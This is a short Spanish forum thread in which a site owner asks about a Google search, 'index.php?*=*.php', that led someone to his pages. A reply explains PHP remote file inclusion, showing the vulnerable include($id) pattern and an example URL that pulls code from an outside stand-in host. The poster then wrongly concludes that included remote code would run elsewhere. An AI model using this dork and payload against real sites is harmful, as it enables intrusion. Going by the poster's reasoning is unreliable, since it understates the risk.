Creo que esto es interesante, la busqueda que hicieron...

Encontre que alguien visito mi web a traves de una busqueda de google, la busqueda es esta:

allinurl: "index.php?*=*.php"

Busca las paginas que pasan una variable con el nombre de otra pagina .php
no se que sentido tiene esta busqueda supongo que sera algun "hacker sillo " buscando un fallo de seguridad en algun script, y no se por donde podria atacar mi web por ejemplo la verdad...se me ocurren cosas como meter la direccion de otra pagina en la variable otrapagina.php, pero no creo que de hay pueda sacar mucho solo un desastre en el contenido de la pagina, a ver si alguien ve algo al respecto o sabe lo que andan buscando e informan !!

Saludos... Me parecio interesante....

Posiblemente un "remote include" si tu web tiene algo como esto:

include($id);

y tu url es algo asi

index.php?id=algo.php

entonces tienes problemas de seguridad

y te pueden incluir un archivo php cambiandole solo la extension (ejemplo GIF)

index.php?id=http://www.algunapagina.com/xploit.gif

en mi caso no podria por que aunque si se usa un include($variable) la variable va dentro de una direccion include("contenido/$variable") entonces no puede insertar nada remoto pero bueno, sigo sin explicarme como aunque se inserte un include remoto como tu dices que conseguiria con eso puesto q la imagen o lo que fuera se ejecutaria en su servidor no en el mio, o si se ejecutara en mi servidor le harian falta datos para si acaso intentar sacar datos de la base de datos...la cual no tiene mas q los datos que muestra la web... asi que no entiendo como seria eso vulnerable... de todas formas muchas gracias por la aclaracion kezo